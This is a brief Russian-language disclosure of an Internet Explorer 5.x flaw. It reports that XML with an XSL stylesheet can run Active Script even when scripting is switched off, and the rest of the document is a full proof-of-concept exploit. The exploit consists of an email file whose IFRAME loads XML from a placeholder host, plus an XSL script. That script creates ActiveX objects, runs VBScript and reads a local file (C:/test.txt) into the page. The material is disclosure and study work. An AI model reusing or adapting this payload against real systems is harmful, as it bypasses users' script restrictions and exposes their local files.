При помощи XML и XSL можно
выполнить Active Script, даже если их исполнение
отключено. Уязвимость нашли в Internet Explorer 5.x.
Эксплоит:
--xstyle.eml-
....
<IFRAME SRC="http://SOMEHOST/xstyle.xml"></IFRAME>
....
---
--xstyle.xml-
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="xstyle.xsl" ?>
<doc>
style
</doc>
---
--xstyle.xsl-
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
a=new ActiveXObject('htmlfile');
a.open();
a.write("<html><body>gg</body></html>");
a.close();
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
v.eval('MsgBox ("This is VBSCRIPT",65,"This is VBSCRIPT")');
x=v.eval('GetObject("C:/test.txt","htmlfile")');
v.eval('MsgBox ("Hi",65,"Hi")');
a.location="about:Here is your file <BR>"+x.body.innerHTML;
]]>
</xsl:script>
</xsl:stylesheet>
---
